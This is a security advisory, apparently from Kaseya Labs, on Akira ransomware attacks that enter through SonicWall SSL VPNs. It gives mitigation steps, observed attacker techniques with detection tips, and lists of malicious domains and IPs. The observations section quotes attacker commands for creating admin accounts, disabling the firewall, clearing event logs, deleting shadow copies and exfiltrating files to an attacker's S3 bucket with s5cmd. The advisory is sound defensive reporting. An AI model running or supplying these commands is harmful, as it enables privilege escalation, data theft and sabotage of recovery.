SonicWall SSL VPNs Potentially Targeted by Akira

*Update August 6th 10PM EDT – SonicWall has posted these events are not connected to a zero-day vulnerability. Instead, there is a significant correlation with threat activity related to CVE-2024-40766, which was previously disclosed and documented in SonicWall’s public advisory SNWLID-2024-0015. 

SonicWall customers should review their recommendations at: https://www.sonicwall.com/support/notices/gen-7-and-newer-sonicwall-firewalls-sslvpn-recent-threat-activity/250804095336430

The new recommendations include:

• Update firmware to 7.3.0
• Reset all local user account passwords
• Enable Botnet Protection and Geo-IP Filtering
• Remove unused or inactive user accounts
• Enforce MFA and strong password policies

Kaseya Detections

Both RocketCyber and Datto AV/EDR have enhanced the sensitivity of follow-on activity (i.e. lateral movement, privilege escalation, etc…).  Originally disclosed by Artic Wolf, Kaseya has seen a similar increase in such activity, including attacks that are not associated with Akira.

Kaseya Labs Recommendations

Ensure Datto Ransomware Detection is enabled in RocketCyber, Datto EDR, Datto RMM or VSA (note: only enable this feature in one system if you have multiple deployed).

Any new user accounts or adds to security groups on the endpoints/domains should be investigated and confirmed to have been legitimately created by a known IT administrator.

Any new remote control software installed (AnyDesk has been previously used by Akira) should be investigated and confirmed to have been legitimately installed by a known IT administrator. Click Here to see our article on legitimate tools used as remote access trojans.

Any failed logins for “unknown” accounts from internal IP addresses should be investigated.

Real-World Observations

After initial access (via the firewall, see SonicWall’s recommendations above), many of the attacks have been “hands on keyboard” where different techniques are used based on the customer environment as opposed to a fully automated campaign. Specific instances we have observed in customer environments:

• Failed logins for “unknown” accounts – From internal IP addresses attempting to login to random/common accounts such as “root”, “admin”, “administrator”. This is typically executed before the threat attacker attempts “known” accounts.
• IP Scanning – To map the network, attackers have utilized a variety of IP scanners – in particular we have observed Angry IP Scanner being actively used (Program Files\Angry IP Scanner\ipscan.exe – hash: ae50c71517182c9773bb138745f10a643b1215078ede439b2b3adb486a9cfb14).
• Listing Users, Shares & Accounts – As part of mapping the environment, we have seen threat actors use the net user (retrieve a list of users on the machine), net accounts (retrieve password/lockout policies), and net share (retrieve network shares) commands.
• Creation of User Accounts – While this is a relatively common activity, if SonicWall is in your environment every new account created should be verified that it was intended, typically done from the command line using the net user <name> /add” command. This can be detected by monitoring for the command or reviewing Windows Event ID 4720.
• Joining User to a Security Group – In a majority of incidents we have investigated, the threat actor has escalated privileges by joining a user to a security enabled group – typically with the command net.exe localgroup administrators /add. This activity can be detected by monitoring for the net command or the following Windows Event IDs: 4728 User added to security-enabled global group, 4732 User added to security-enabled local group and 4756 User added to security-enabled universal group. Any additions to security-enabled groups should be verified that it was intended.
• Disable Firewall – We have seen a variety of changes to the Windows Firewall using the netsh command to evade detection (i.e. netsh advfirewall set currentprofile state off, netsh advfirewall set allprofiles state off).
• Exfiltration of Data – Attackers have used a wide variety of tools to exfiltrate data with other researchers noting the use of Filezilla and WinSCP. We have observed the use of s5cmd – a high performance, open-source, command line tool built for parallel processing and rapidly transferring large amounts of data to S3 buckets (for example: s5cmd –credentials-file credentials cp –include “.pdf” –include “.png” –include “.doc” –include “.docx” –include “.xls” –include “.xlsx” –include “*.tif” “redacted folder/path” s3://[attackers bucket]).
• Installation of Remote Control Tools – To establish persistence, we have observed threat actors installing legitimate remote control tools. While this could include a large number of commercial applications (see a post and detection script on legitimate RC tools HERE), we have observed AnyDesk on several occasions. Any new remote control installs should be investigated and Windows Event ID 4697 and 7045 can be used to capture new services installs.
• Deletion of Logs and Shadow Copies – To evade detection threat actors are “cleaning up” by deleting Windows Event Logs (using wevtutil utility such as wevtutil.exe using commands such as “wevtutil.exe cl CloudBackup”, “wevtutil.exe cl Security”, “wevtutil.exe cl System”) and using VSS to delete shadow copies in the final stages before deploying the ransomware encryptor to make recovery more difficult (i.e. “vssadmin delete shadows /all /quiet”)

Akira Details

Akira is a ransomware group that has quickly gained attention for its targeted attacks on large enterprises and critical infrastructure sectors.  Past campaigns have included attacks on Cisco, SonicWall and other VPN/Firewall vendors.  They typically utilize a combination of advanced encryption algorithms, including RSA and ChaCha20, to ensure that data recovery without their decryption keys is virtually impossible.

Akira is known for “hands-on keyboard” techniques, meaning using manual techniques over automated malware after initial access is gained.  This makes detection more difficult as a particular automated pattern is not evident.

Indicators of Compromise (IOCs)

The following IOCs have been recently associated with these events and with the Akira group overall:

HOSTNAMES

ngryipscanner[dot]org
2rxyt9urhq0bgj[dot]org
servicewrapone[dot]com
gogoservicewrap[dot]com
useproakira[dot]com
goservicewrap[dot]com
joinservicewrap[dot]com
servicewrap[dot]pro
servicewrap-go[dot]com
airbluefootgear[dot]com
reinforcenh[dot]shop
gutterydhowi[dot]shop
stamppreewntnq[dot]shop
stagedchheiqwo[dot]shop
signal-security[dot]online
signal-protect[dot]host
vozmeatillu[dot]shop
offensivedzvju[dot]shop
traineiwnqo[dot]shop
syncnet[dot]cc
lynxblog[dot]net
caffegclasiqwp[dot]shop
locatedblsoqp[dot]shop
media[dot]storage
devnull[dot]anondns[dot]net
ksdjwi[dot]eye-network[dot]ru

FILE HASHES

IP Addresses

83.229.17[dot]60
193.242.184[dot]150
188.40.187[dot]145
185.174.100[dot]203
170.130.55[dot]223
109.205.195[dot]211
172.96.137[dot]160
104.238.205[dot]105
77.247.126[dot]239
45.86.208[dot]240
142.252.99[dot]59
192.151.154[dot]122
115.78.7[dot]179
216.245.184[dot]181
78.153.140[dot]218
168.119.96[dot]41
223.25.78[dot]136
158.140.135[dot]244
129.126.109[dot]50
118.189.188[dot]122
199.188.207[dot]168
213.239.206[dot]148
37.187.26[dot]72
43.166.244[dot]192
8.222.225[dot]8
45.77.39[dot]28
188.165.54[dot]175
211.59.174[dot]163
14.128.14[dot]5
185.215.113[dot]43
195.211.191[dot]144
115.63.35[dot]55
176.65.134[dot]17
116.88.34[dot]184
101.100.182[dot]122
107.167.42[dot]212
65.181.111[dot]157
175.178.98[dot]219
102.117.168[dot]85
198.199.74[dot]62
27.124.46[dot]219
27.124.46[dot]211